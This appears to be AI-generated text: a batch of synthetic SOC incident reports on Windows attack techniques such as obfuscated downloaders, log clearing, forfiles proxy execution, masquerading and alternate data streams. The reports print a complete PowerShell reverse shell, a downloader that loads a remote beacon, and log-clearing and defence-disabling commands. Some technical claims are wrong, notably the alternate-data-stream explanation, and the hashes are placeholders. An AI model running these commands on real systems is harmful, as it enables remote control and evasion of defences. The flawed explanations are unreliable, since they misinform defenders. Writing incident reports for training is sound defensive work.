14:00 – Attacker RDPs to IT-WS-112 using bjones credentials
14:05 – PowerShell launched to disable Defender
14:08 – Multiple Defender disable commands executed
14:09 – Windows Firewall disabled
14:10 – Defender detects tampering
14:15 – Alert triggers
Defenses Impaired:
Real-time monitoring: DISABLED
Behavior monitoring: DISABLED
Cloud-delivered protection: DISABLED
Email scanning: DISABLED
MAPS reporting: DISABLED
Exclusions added: Temp folder, .exe files, malware.exe
Windows Firewall: DISABLED
Attacker Actions After Defense Impairment:
Downloaded Mimikatz to C:\Temp\
Attempted credential dumping (partially successful)
Created local admin account “helpdesk”
Scheduled task for persistence
Account Status:
bjones had Domain Admin privileges (over-privileged)
No MFA on account (now enforced)
3. Investigation Findings:
Timeline:
13:55 – Phishing email opened
13:56 – Credentials compromised
14:00-14:05 – Attacker RDP access
14:05-14:09 – Defenses disabled
14:10 – Defender detects tampering
14:15 – Alert triggers
14:17 – Account disabled
14:18 – Defenses restored
Indicators of Compromise (IoCs):
Network:
– Attacker IP: 45.134.225[.]78
Account:
– bjones (compromised)
– helpdesk (local admin created)
Files:
– C:\Temp\mimikatz.exe (SHA256: b2c3d4e5…)
Scheduled Task:
– “WindowsMaintenance”
4. Containment Actions:
Immediate Actions:
Disabled bjones account.
Re-enabled all Defender protections.
Re-enabled Windows Firewall.
Removed attacker-created exclusions.
Deleted helpdesk account.
Removed scheduled task.
Blocked attacker IP.
Host Remediation:
Deleted Mimikatz and other tools.
Full scan (no other malware).
No reimage needed (cleaned).
Account Remediation:
Reset bjones password.
Enforced MFA.
Removed unnecessary admin privileges.
5. Root Cause Analysis:
Primary Cause: Admin account compromised via phishing.
Contributing Factors:
No MFA on admin account.
User had excessive privileges (Domain Admin).
RDP allowed from internet.
6. Business Impact:
Operational Impact: IT admin offline for 2 hours.
Security Impact: Defenses down for 8 minutes.
Data Exposure: Some credentials may have been dumped.
7. Remediation & Prevention:
Completed Actions:
Defenses restored.
Compromised account secured.
Attacker artifacts removed.
Technical Controls Enhanced:
Enforced MFA for all admin accounts.
Moved RDP behind VPN only.
Implemented Privileged Access Workstations.
Created alert for any Defender setting changes.
8. Conclusion:
An attacker compromised an IT admin via phishing and systematically disabled Windows Defender and Firewall. Defender’s tamper protection detected the changes, enabling rapid restoration. The account was secured, and defenses were re-enabled within minutes.
Closure Rationale: Defenses restored; account secured; attacker blocked.
Analyst: [Walter White], SOC Analyst Date: 2024-02-19 15:30 EST
58. T1027 – Obfuscated Files (FortiSandbox Detection)
FortiSandbox Alert Details
Alert ID: FORTI-OBFUSCATED-1027-7842 Alert Time: 2024-02-19 11:30:22 EST Severity: HIGH (88/100) Source: Fortinet FortiSandbox Rule: “Obfuscated JavaScript Detected – Potential Malware Downloader” MITRE ATT&CK: T1027.002 – Obfuscated Files or Information: Software Packing
Alert Details:
File Analysis Report:
File Name: invoice_7842.js
File Size: 124 KB
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Source: Email attachment to user in Finance
Submission Time: 11:15 EST
Obfuscation Analysis:
File is heavily obfuscated JavaScript
Multiple layers of encoding:
Layer 1: Base64 encoded (detected)
Layer 2: XOR with key 0x42 (detected)
Layer 3: ROT13 (detected)
Layer 4: GZIP compressed (detected)
Layer 5: Final PowerShell script
Deobfuscated Content:
$wc = New-Object System.Net.WebClient
$payload = $wc.DownloadData(‘http://185.143.221[.]89/beacon.bin’)
$assembly = [System.Reflection.Assembly]::Load($payload)
$entryPoint = $assembly.EntryPoint
$entryPoint.Invoke($null, (, [string[]] (”,)))
Sandbox Behavior:
When executed, downloads Cobalt Strike beacon
Beacon connects to 185.143.221[.]89:443
Injects into legitimate process
Establishes persistence via scheduled task
Threat Score: 10/10 (Malicious)
Obfuscation: 10/10
Network Behavior: 10/10
Persistence: 8/10
Overall: 10/10 (Critical)
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify FortiSandbox analysis
FortiSandbox Console
Confirmed heavily obfuscated malicious JavaScript
2. Email Investigation
Find email with attachment
Proofpoint, Exchange
Email to finance@company.com from spoofed vendor
3. Quarantine Email
Block and remove email
Proofpoint
Email quarantined from all mailboxes
4. User Check
Verify if user executed file
CrowdStrike
User did not open attachment (alert before execution)
5. IOC Distribution
Block URLs and IPs
Palo Alto, Cisco Umbrella
URLs and IPs added to blocklists
6. Threat Hunting
Check for similar files
FortiSandbox, Splunk
No other occurrences found
Jira Incident Report
Ticket: SOC-2024-098 Summary: T1027 – Obfuscated JavaScript Malware Downloader in Email Status: RESOLVED Resolution: MALICIOUS – Blocked Before Execution Priority: P2 – MEDIUM Labels: T1027, obfuscated-files, javascript, fortisandbox, phishing Components: Email-Security, Malware-Analysis
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Fortinet FortiSandbox.
Alert: “Obfuscated JavaScript Detected – Potential Malware Downloader”.
File: invoice_7842.js (email attachment).
Target: Finance Department.
Time: 2024-02-19 11:30 EST.
Technique: MITRE ATT&CK T1027.002 – Obfuscated Files or Information: Software Packing.
2. Technical Analysis:
Attack Chain:
11:10 – Email sent from “vendor@payment-update[.]net”
11:11 – Email delivered to finance@company.com
11:12 – FortiSandbox analyzes attachment (inline)
11:15 – Analysis begins
11:25 – Deobfuscation complete
11:28 – Malicious behavior confirmed
11:30 – Alert triggers
11:31 – Email quarantined (before user opened)
Obfuscation Layers:
Layer 1: Base64 encoding (conceals initial content)
Layer 2: XOR with key 0x42 (adds simple encryption)
Layer 3: ROT13 substitution (common obfuscation)
Layer 4: GZIP compression (hides patterns)
Layer 5: Final PowerShell downloader (payload)
Final Payload:
Downloads beacon.bin from 185.143.221[.]89
Loads as .NET assembly
Executes entry point (Cobalt Strike)
Connects to C2 on port 443
Email Details:
Sender: vendor@payment-update[.]net
Subject: “Invoice #7842 – Overdue Payment”
Attachment: invoice_7842.js (masquerading as PDF)
3. Investigation Findings:
Timeline:
11:10 – Email sent
11:11 – Email delivered
11:12-11:28 – FortiSandbox analysis
11:30 – Alert triggers
11:31 – Email quarantined
11:32 – SOC investigates
11:35 – User confirmed (no execution)
Indicators of Compromise (IoCs):
File:
– invoice_7842.js (SHA256: a1b2c3d4…)
Network:
– Download URL: http://185.143.221[.]89/beacon.bin
– C2: 185.143.221[.]89:443
Email:
– Sender: vendor@payment-update[.]net
– Subject: “Invoice #7842 – Overdue Payment”
4. Containment Actions:
Immediate Actions:
Quarantined email from all mailboxes.
Blocked URLs and IPs at firewall and proxy.
Added file hash to blocklists.
User Notification:
Finance team alerted to campaign.
No user action needed (email not opened).
Email Rule Update:
Created Proofpoint rule to block .js attachments.
Enhanced filtering for invoice-themed emails.
5. Root Cause Analysis:
Primary Cause: External attacker sending obfuscated malware via email.
Contributing Factors:
JavaScript attachments allowed (now blocked).
No user execution (prevented by sandbox).
6. Business Impact:
Operational Impact: None.
Data Exposure: None (email not opened).
Financial Impact: None.
7. Remediation & Prevention:
Completed Actions:
Email quarantined.
IOCs blocked.
Users notified.
Technical Controls Enhanced:
Blocked all JavaScript attachments via email gateway.
Enabled FortiSandbox inline analysis for all emails.
Created alert for any obfuscated files.
8. Conclusion:
A sophisticated obfuscated JavaScript malware was delivered via email to the Finance department. FortiSandbox deobfuscated the multi-layer file, identified it as a Cobalt Strike downloader, and triggered an alert before the user could open it. No compromise occurred.
Closure Rationale: Malware blocked; IOCs added; email policy updated.
Analyst: [Walter White], SOC Analyst Date: 2024-02-19 12:30 EST
59. T1070 – Indicator Removal (Splunk Detection)
Splunk Alert Details
Alert ID: SPLUNK-LOG-CLEAR-1070-7842 Alert Time: 2024-02-19 16:30:45 EST Severity: HIGH (85/100) Source: Splunk Enterprise Security Rule: “Security Logs Cleared – Potential Cover-up” MITRE ATT&CK: T1070.001 – Indicator Removal: Clear Windows Event Logs
Alert Details:
Correlated Events:
Windows Event ID 1102 (Security Log Cleared):
Time: 16:25 EST
Host: SEC-SRV-045 (Security Server)
User: SYSTEM (via wevtutil)
Log: Security
Details: “The audit log was cleared”
Windows Event ID 104 (System Log Cleared):
Time: 16:25:30 EST
Host: SEC-SRV-045
Log: System
Details: System log cleared
Windows Event ID 33 (PowerShell Operational Log Cleared):
Time: 16:26 EST
Host: SEC-SRV-045
Log: Windows PowerShell
Details: PowerShell log cleared
Process Creation (Event ID 4688):
Time: 16:24 EST
Process: wevtutil.exe
Command: wevtutil cl Security & wevtutil cl System & wevtutil cl “Windows PowerShell”
Preceding Events (now cleared, recovered from forwarded logs):
16:20-16:23 – Multiple failed login attempts (RDP brute force)
16:23 – Successful login from 45.134.225[.]78
16:24 – wevtutil executed to clear logs
Detection Logic:
Multiple event logs cleared in quick succession
wevtutil executed by suspicious process
Preceding failed logins detected via forwarded logs
Pattern matches attacker covering tracks
Additional Context:
Host: Critical security server
Forwarded logs preserved in Splunk (not cleared)
Attacker unaware of centralized logging
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Splunk correlation
Splunk ES
Confirmed log clearing events
2. Recover Cleared Logs
Check forwarded logs
Splunk (forwarded)
Full activity recovered from Splunk
3. Attacker Activity
Analyze recovered logs
Splunk Search
RDP brute force, successful login, log clearing
4. Immediate Action
Isolate compromised host
CrowdStrike
SEC-SRV-045 quarantined
5. Account Remediation
Reset affected user password
Azure AD, AD
Password reset; MFA enforced
6. Threat Hunting
Check for other cleared logs
Splunk
No other log clearing events
Jira Incident Report
Ticket: SOC-2024-099 Summary: T1070 – Attacker Clears Security Logs After RDP Brute Force Status: RESOLVED Resolution: MALICIOUS – Logs Recovered from Splunk Priority: P2 – MEDIUM Labels: T1070, indicator-removal, log-clearing, splunk, rdp-brute-force Components: Log-Management, Incident-Response
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Splunk Enterprise Security.
Alert: “Security Logs Cleared – Potential Cover-up”.
Host: SEC-SRV-045 (Critical Security Server).
Time: 2024-02-19 16:30 EST.
Technique: MITRE ATT&CK T1070.001 – Indicator Removal: Clear Windows Event Logs.
2. Technical Analysis:
Attack Chain (Recovered from Splunk forwarded logs):
16:20:00 – First RDP connection attempt from 45.134.225[.]78 (user: admin)
16:20:15 – Failed login (wrong password)
16:20:30 – Second attempt (user: administrator)
16:20:45 – Failed
16:21:00 – Third attempt (user: sec_admin)
16:21:15 – Failed
16:21:30 – Fourth attempt (user: svc_monitor)
16:21:45 – Failed
16:22:00 – Fifth attempt (user: backup_admin)
16:22:15 – Failed
16:22:30 – Sixth attempt (user: jwilson)
16:23:00 – SUCCESS (password: Winter2024!)
16:23:30 – Attacker enumerates system
16:24:00 – wevtutil.exe executed
16:24-16:26 – Logs cleared
16:30 – Splunk alert triggers
Compromised Account:
Username: jwilson (standard user)
Password: Winter2024! (weak, reused)
Privileges: Remote Desktop Users group only
Attacker Actions Before Log Clearing:
Enumerated users and groups
Checked running processes
No data exfiltration attempted
Log Recovery:
Local logs cleared (Security, System, PowerShell)
Forwarded logs preserved in Splunk
Complete attack timeline recovered
3. Investigation Findings:
Timeline:
16:20-16:23 – Brute force attempts
16:23 – Successful login
16:24 – Log clearing
16:30 – Alert triggers
16:32 – SOC investigates
16:35 – Host isolated
16:36 – jwilson account disabled
Indicators of Compromise (IoCs):
Network:
– Attacker IP: 45.134.225[.]78
Account:
– jwilson (compromised)
Commands:
– wevtutil cl Security
– wevtutil cl System
– wevtutil cl “Windows PowerShell”
4. Containment Actions:
Immediate Actions:
Isolated compromised host.
Disabled jwilson account.
Blocked attacker IP at firewall.
Terminated any active sessions.
Account Remediation:
Reset jwilson password.
Enforced MFA.
Removed from Remote Desktop Users group (unnecessary).
Host Remediation:
Full scan (no malware found).
Verified no persistence installed.
No reimage needed.
5. Root Cause Analysis:
Primary Cause: Weak password on user account (Winter2024!).
Contributing Factors:
Password policy allowed weak passwords.
RDP exposed to internet (should be VPN only).
User had unnecessary RDP access.
6. Business Impact:
Operational Impact: Security server offline for 1 hour.
Data Exposure: None (attacker interrupted).
Forensic Value: Logs preserved via Splunk.
7. Remediation & Prevention:
Completed Actions:
Host secured.
Account remediated.
Attacker blocked.
Technical Controls Enhanced:
Enforced strong password policy.
Moved RDP behind VPN only.
Enhanced monitoring for log clearing events.
8. Conclusion:
An attacker performed RDP brute force, successfully logged in using a weak password, and attempted to cover tracks by clearing security logs. Splunk’s forwarded logs preserved the full attack timeline. The host was isolated, and the account secured before any data exfiltration.
Closure Rationale: Logs recovered; account secured; attacker blocked.
Analyst: [Walter White], SOC Analyst Date: 2024-02-19 17:30 EST
60. T1202 – Indirect Command Execution (Sysmon Detection)
Sysmon Alert Details
Alert ID: SYSMON-INDIRECT-1202-7842 Alert Time: 2024-02-19 10:30:15 EST Severity: HIGH (82/100) Source: Sysmon (Event ID 1 – Process Creation) Rule: “Indirect Command Execution via Forfiles.exe” MITRE ATT&CK: T1202 – Indirect Command Execution
Alert Details:
Event ID: 1 (Process Creation) Time: 10:25 EST Host: ENG-WS-034 (Engineering Workstation) User: rpatel (Raj Patel, Engineer)
Process Tree:
explorer.exe (PID: 2341)
cmd.exe (PID: 4789)
forfiles.exe (PID: 4792)
Command: forfiles /p C:\Windows\System32 /m notepad.exe /c “cmd /c powershell -WindowStyle Hidden -EncodedCommand JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQA5ADIALgAxADYAOAAuADMANAAuADUANgAnACwANAA0ADMAKQA7AA==”
Detection Logic:
forfiles.exe used to execute command (indirect execution)
Command executes PowerShell with encoded reverse shell
forfiles.exe is a trusted Windows binary (living off the land)
Pattern matches attacker technique to bypass AppLocker
Decoded PowerShell Command:
$client = New-Object System.Net.Sockets.TCPClient(‘192.168.34.56’,443);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + ‘PS ‘ + (pwd).Path + ‘> ‘;
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush()
};
$client.Close()
Additional Context:
forfiles.exe used to indirectly execute PowerShell
C2 IP: 192.168.34.56 (internal)
User rpatel had previously clicked phishing link
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Sysmon events
Splunk, Sysmon Logs
Confirmed indirect command execution via forfiles
2. Command Decoding
Decode PowerShell
CyberChef
Reverse shell to 192.168.34.56:443
3. Process Investigation
Identify source of command
CrowdStrike
Malicious script downloaded earlier
4. Immediate Action
Terminate reverse shell
CrowdStrike
PowerShell process killed
5. C2 Investigation
Identify 192.168.34.56
CMDB, CrowdStrike
Internal engineering host (already compromised)
6. Host Isolation
Isolate both hosts
CrowdStrike
Both hosts quarantined
Jira Incident Report
Ticket: SOC-2024-100 Summary: T1202 – Indirect Command Execution via Forfiles.exe for Reverse Shell Status: RESOLVED Resolution: MALICIOUS – Reverse Shell Terminated Priority: P2 – MEDIUM Labels: T1202, indirect-command, forfiles, lolbin, sysmon, reverse-shell Components: Endpoint-Security, Defense-Evasion
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Sysmon Event ID 1 (Process Creation).
Alert: “Indirect Command Execution via Forfiles.exe”.
Host: ENG-WS-034 (Engineering Department, user rpatel).
Time: 2024-02-19 10:30 EST.
Technique: MITRE ATT&CK T1202 – Indirect Command Execution.
2. Technical Analysis:
Attack Chain:
09:45 – User clicked phishing link in email
09:46 – PowerShell downloaded and executed initial script
09:47 – Script downloaded Cobalt Strike beacon
09:48 – Beacon injected into svchost.exe
09:50 – Attacker used beacon to launch indirect command
10:25 – forfiles.exe executed with malicious command
10:25 – PowerShell reverse shell to internal C2
10:30 – Sysmon detects
Indirect Execution Technique:
Binary: forfiles.exe (legitimate Windows tool)
Purpose: Normally used to run commands on files
Abuse: /c parameter executes arbitrary command
Why: Bypasses AppLocker (trusted binary)
Command: Launches encoded PowerShell reverse shell
C2 Infrastructure:
Internal C2: 192.168.34.56:443 (ENG-WS-089)
External C2: 185.143.221[.]89 (from engineering host logs)
Chain: ENG-WS-034 -> ENG-WS-089 -> External
Reverse Shell Capabilities:
Interactive PowerShell session
Full command execution
File upload/download
No data exfiltration before termination
3. Investigation Findings:
Timeline:
09:45 – Phishing email opened
09:46-09:48 – Malware installation
10:25 – Indirect command execution
10:30 – Sysmon alert
10:32 – SOC investigates
10:35 – Reverse shell terminated
10:36 – Both hosts isolated
Indicators of Compromise (IoCs):
Process:
– forfiles.exe /p C:\Windows\System32 /m notepad.exe /c “cmd /c powershell -WindowStyle Hidden -EncodedCommand JABjAGwAaQ…
Network:
– Internal C2: 192.168.34.56:443
– External C2: 185.143.221[.]89
Files:
– Initial dropper (SHA256: a1b2c3d4…)
4. Containment Actions:
Immediate Actions:
Terminated reverse shell process.
Isolated ENG-WS-034.
Isolated ENG-WS-089 (C2 host).
Blocked external C2 at firewall.
Malware Removal:
Removed injected code from svchost.exe on both hosts.
Deleted malicious files.
Full scans (clean).
User Remediation:
Password reset for rpatel.
Phishing training assigned.
5. Root Cause Analysis:
Primary Cause: User clicked phishing link.
Contributing Factors:
AppLocker allowed forfiles.exe (legitimate binary).
PowerShell allowed to execute.
No monitoring for LOLBin abuse.
6. Business Impact:
Operational Impact: Two engineering workstations offline for 2 hours.
Data Exposure: None (C2 contained).
7. Remediation & Prevention:
Completed Actions:
Reverse shell terminated.
Malware removed.
Hosts secured.
C2 blocked.
Technical Controls Enhanced:
Created Sysmon rule for forfiles.exe with suspicious command lines.
Enhanced monitoring for LOLBin abuse.
Restricted PowerShell execution policy.
8. Conclusion:
An attacker used forfiles.exe, a legitimate Windows binary, to indirectly execute a PowerShell reverse shell, bypassing application controls. Sysmon detected the anomalous process execution, enabling rapid termination. The reverse shell was active for only 5 minutes before containment.
Closure Rationale: Reverse shell terminated; malware removed; LOLBin monitoring enhanced.
Analyst: [Walter White], SOC Analyst Date: 2024-02-19 11:30 EST
End of Batch 12
Ready for your next batch of prompts whenever you are.
Batch 13: Defense Evasion & Credential Access Incident Reports
Here are the next 5 detailed SOC incident reports.
61. T1036 – Masquerading (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-MASQUERADE-1036-7842 Alert Time: 2024-02-20 09:30:22 EST Severity: HIGH (85/100) Source: CrowdStrike Falcon EDR Rule: “Process Masquerading – Suspicious Path for System Binary” MITRE ATT&CK: T1036.005 – Masquerading: Match Legitimate Name or Location
Alert Details:
Detection: Process with system binary name running from non-standard path
Host: FIN-WS-045 (Finance Department) User: bturner (Brian Turner, Accountant) Time: 09:25 EST
Process Details:
Process Name: svchost.exe
Process Path: C:\Users\bturner\AppData\Local\Temp\svchost.exe
Expected Path: C:\Windows\System32\svchost.exe
PID: 4789
Parent Process: explorer.exe
Command Line: “C:\Users\bturner\AppData\Local\Temp\svchost.exe” -k netsvcs
File Details:
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
File Size: 156 KB
Digital Signature: None (legitimate svchost.exe is signed by Microsoft)
Creation Time: 09:20 EST
Behavior Analysis:
Process attempted to connect to 185.143.221[.]89:443
Process attempted to access lsass.exe (PID: 568) – ACCESS DENIED
Process created child process: powershell.exe (encoded command)
Detection Logic:
Process name matches legitimate system binary (svchost.exe)
Process running from user-writable path (Temp)
No digital signature (expected signed by Microsoft)
Anomalous behavior (network, lsass access)
Additional Context:
User bturner reported receiving suspicious email with attachment
Attachment opened at 09:15 EST
No legitimate reason for svchost.exe in Temp folder
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify CrowdStrike alert
CrowdStrike Falcon Console
Confirmed masquerading svchost.exe from Temp folder
2. File Analysis
Analyze svchost.exe
CrowdStrike Sandbox
Malicious executable (Cobalt Strike loader)
3. Process Investigation
Terminate malicious process
CrowdStrike
Process killed
4. File Removal
Delete svchost.exe
CrowdStrike Live Response
File deleted
5. User Interview
Contact user
Teams, Phone
User opened “invoice.doc” from email
6. Email Investigation
Find source email
Proofpoint, Exchange
Email quarantined; attachment malicious
Jira Incident Report
Ticket: SOC-2024-101 Summary: T1036 – Masquerading svchost.exe Running from Temp Folder Status: RESOLVED Resolution: MALICIOUS – Process Terminated Priority: P2 – MEDIUM Labels: T1036, masquerading, svchost, lolbin, crowdstrike Components: Endpoint-Security, Malware-Response
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “Process Masquerading – Suspicious Path for System Binary”.
Host: FIN-WS-045 (Finance Department, user bturner).
Process: C:\Users\bturner\AppData\Local\Temp\svchost.exe (masquerading as svchost.exe).
Time: 2024-02-20 09:30 EST.
Technique: MITRE ATT&CK T1036.005 – Masquerading: Match Legitimate Name or Location.
2. Technical Analysis:
Attack Chain:
09:15 – User receives email from “vendor@payment-update[.]net”
09:16 – Email contains attachment “invoice.doc”
09:17 – User opens attachment (enables macros)
09:18 – Macro downloads svchost.exe from 185.143.221[.]89
09:20 – svchost.exe saved to Temp folder
09:21 – User executes file (thinks it’s legitimate)
09:22 – Malicious svchost.exe runs
09:23 – Attempts C2 connection to 185.143.221[.]89:443
09:23 – Attempts LSASS access (blocked by PPL)
09:25 – CrowdStrike alerts
Masquerading Technique:
Binary Name: svchost.exe (legitimate Windows service host)
Expected Path: C:\Windows\System32\svchost.exe
Actual Path: C:\Users\bturner\AppData\Local\Temp\svchost.exe
Signature: None (legitimate svchost.exe is signed by Microsoft)
Purpose: Evade detection by blending in with legitimate processes
Malware Analysis:
Type: Cobalt Strike loader
Capabilities:
Injects into legitimate svchost.exe (after checking path)
Attempts credential dumping (LSASS)
Establishes C2 beaconing
Downloads additional payloads
User Activity:
User expected to open invoice document
Unknowingly executed malware
3. Investigation Findings:
Timeline:
09:15 – Phishing email received
09:17 – Attachment opened
09:18-09:21 – Malware downloaded and executed
09:23 – C2 attempt (blocked)
09:25 – CrowdStrike alert
09:27 – SOC investigates
09:30 – Process terminated, file deleted
Indicators of Compromise (IoCs):
Files:
– C:\Users\bturner\AppData\Local\Temp\svchost.exe (SHA256: a1b2c3d4…)
– invoice.doc (original macro doc) – SHA256: b2c3d4e5…
Network:
– C2: 185.143.221[.]89:443
– Download URL: http://185.143.221[.]89/svchost.exe
Email:
– Sender: vendor@payment-update[.]net
– Subject: “Invoice #7842”
4. Containment Actions:
Immediate Actions:
Terminated malicious svchost.exe process.
Deleted file from Temp folder.
Isolated host temporarily.
Blocked C2 IP at firewall.
Host Remediation:
Full scan (no other malware).
Verified no persistence installed.
No reimage needed.
User Remediation:
Password reset.
Phishing training assigned.
Reported email to security team.
5. Root Cause Analysis:
Primary Cause: User opened malicious macro-enabled document.
Contributing Factors:
Macros enabled in Office.
No ASR rule blocking Office child processes.
User lacked recent phishing training.
6. Business Impact:
Operational Impact: Finance workstation offline for 1 hour.
Data Exposure: None (C2 blocked, LSASS access denied).
7. Remediation & Prevention:
Completed Actions:
Malicious process terminated.
File deleted.
User educated.
C2 blocked.
Technical Controls Enhanced:
Enabled ASR rule “Block Office applications from creating child processes”.
Blocked macros from internet via GPO.
Created alert for any system binary running from non-standard path.
8. Conclusion:
A user opened a phishing email with a macro-enabled document that downloaded and executed a malicious executable masquerading as svchost.exe. CrowdStrike detected the process running from an anomalous path, enabling rapid termination before significant C2 activity.
Closure Rationale: Malicious process terminated; file deleted; user educated.
Analyst: [Walter White], SOC Analyst Date: 2024-02-20 10:30 EST
62. T1564 – Hide Artifacts (Sysmon Detection)
Sysmon Alert Details
Alert ID: SYSMON-HIDE-ARTIFACTS-1564-7842 Alert Time: 2024-02-20 14:15:33 EST Severity: HIGH (82/100) Source: Sysmon (Event ID 15 – Alternate Data Stream Created) Rule: “NTFS Alternate Data Stream Created – Potential Hidden Data” MITRE ATT&CK: T1564.004 – Hide Artifacts: NTFS File Attributes
Alert Details:
Event ID: 15 (Alternate Data Stream Created) Time: 14:10 EST Host: DEV-WS-112 (Development Workstation) User: alexchen (Alex Chen, Developer)
File: C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\UpdateTask (Zone.Identifier stream) Stream Name: Zone.Identifier Stream Size: 26 bytes
Additional Sysmon Events:
Event ID 11 (File Create):
Time: 14:09 EST
Path: C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\UpdateTask
Process: powershell.exe (PID: 4789)
Command: Out-File -FilePath C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\UpdateTask -Stream Zone.Identifier -Value “[ZoneTransfer]`nZoneId=3”
Event ID 1 (Process Creation):
Time: 14:08 EST
Process: powershell.exe
Command: powershell -Command “Add-Content -Path C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\UpdateTask -Stream Zone.Identifier -Value ‘[ZoneTransfer]`nZoneId=3′”
Detection Logic:
Alternate Data Stream (ADS) created on a system file
ADS used to hide data (Zone.Identifier marks file as downloaded from internet)
File path is legitimate Windows Update task location
Process using ADS to hide origin of file
Technique used to evade security tools that don’t scan ADS
Additional Context:
File UpdateTask is actually a malicious scheduled task XML
Hidden ADS used to mark it as “safe” (ZoneId=3 means internet)
Scheduled task created earlier by malware
ADS hides the fact that file came from internet
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Sysmon events
Splunk, Sysmon Logs
Confirmed ADS creation on scheduled task file
2. File Analysis
Examine UpdateTask file
PowerShell, Notepad
Malicious scheduled task XML (runs PowerShell)
3. Scheduled Task Check
List tasks
schtasks, PowerShell
Malicious task “WindowsUpdateTask” found
4. Immediate Action
Disable and delete task
schtasks /delete
Task removed
5. ADS Removal
Remove ADS stream
powershell Remove-Item -Stream
ADS deleted
6. Threat Hunting
Check for other ADS
Sysmon, Splunk
No other suspicious ADS found
Jira Incident Report
Ticket: SOC-2024-102 Summary: T1564 – Malicious Scheduled Task Hidden via Alternate Data Stream Status: RESOLVED Resolution: MALICIOUS – Artifact Removed Priority: P2 – MEDIUM Labels: T1564, hide-artifacts, ads, alternate-data-stream, sysmon Components: Endpoint-Security, Persistence
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Sysmon Event ID 15 (Alternate Data Stream Created).
Alert: “NTFS Alternate Data Stream Created – Potential Hidden Data”.
Host: DEV-WS-112 (Development Department, user alexchen).
File: C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\UpdateTask (Zone.Identifier stream).
Time: 2024-02-20 14:15 EST.
Technique: MITRE ATT&CK T1564.004 – Hide Artifacts: NTFS File Attributes.
2. Technical Analysis:
Attack Chain:
13:45 – User clicked phishing link
13:46 – Malware downloaded
13:50 – Malware created scheduled task XML file (UpdateTask)
13:51 – Malware used PowerShell to add Zone.Identifier ADS
13:52 – ADS marks file as “downloaded from internet” (ZoneId=3)
13:53 – Malware registers scheduled task using schtasks
14:08 – PowerShell executed to create ADS (detected)
14:10 – Sysmon alerts
Scheduled Task Details:
Task Name: WindowsUpdateTask (masquerading)
Task XML Location: C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\UpdateTask
Trigger: Daily at 3 AM
Action: PowerShell encoded reverse shell
Hidden via: ADS (Zone.Identifier) to avoid suspicion
ADS Technique:
Stream: Zone.Identifier
Purpose: Indicates file originated from internet zone
Abuse: Malware adds this stream to make file appear legitimate
Evasion: Many security tools ignore ADS when scanning
User Activity:
User clicked link in email about “security update”
Unaware of malware installation
3. Investigation Findings:
Timeline:
13:45 – Phishing link clicked
13:50-13:53 – Scheduled task created
14:08 – ADS added
14:10 – Sysmon alert
14:15 – SOC investigates
14:18 – Task deleted, ADS removed
Indicators of Compromise (IoCs):
Files:
– C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\UpdateTask (with ADS)
Scheduled Task:
– Name: WindowsUpdateTask
– Action: PowerShell reverse shell
Network:
– C2: 185.143.221[.]89:443
4. Containment Actions:
Immediate Actions:
Deleted malicious scheduled task.
Removed ADS stream from file.
Deleted the task XML file.
Isolated host temporarily.
Host Remediation:
Full scan (no other malware).
Verified no other ADS present.
User Remediation:
Password reset.
Phishing training assigned.
5. Root Cause Analysis:
Primary Cause: User clicked phishing link, leading to malware.
Contributing Factors:
No ASR rule blocking scheduled task creation.
ADS not monitored (until Sysmon).
6. Business Impact:
Operational Impact: Developer workstation offline for 1 hour.
Data Exposure: None.
7. Remediation & Prevention:
Completed Actions:
Malicious task removed.
ADS deleted.
User educated.
Technical Controls Enhanced:
Created Sysmon rule for ADS creation on system directories.
Enhanced scheduled task monitoring.
Enabled scanning of ADS in antivirus.
8. Conclusion:
Attackers used an Alternate Data Stream to hide the origin of a malicious scheduled task file. Sysmon detected the ADS creation, leading to discovery and removal of the hidden persistence mechanism.
Closure Rationale: Malicious task removed; ADS deleted; controls enhanced.
Analyst: [Walter White], SOC Analyst Date: 2024-02-20 15:30 EST
63. T1218 – System Binary Proxy Execution (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-RUNDLL32-1218-7842 Alert Time: 2024-02-20 11:30:22 EST Severity: HIGH (88/100) Source: CrowdStrike Falcon EDR Rule: “Suspicious Rundll32 Execution – No Command Line Arguments” MITRE ATT&CK: T1218.011 – System Binary Proxy Execution: Rundll32
Alert Details:
Detection: Rundll32.exe executed with suspicious parameters
Host: MKT-WS-078 (Marketing Department) User: sjones (Sarah Jones, Marketing Manager) Time: 11:25 EST
Process Tree:
explorer.exe (PID: 2341)
cmd.exe (PID: 4789)
rundll32.exe (PID: 4792)
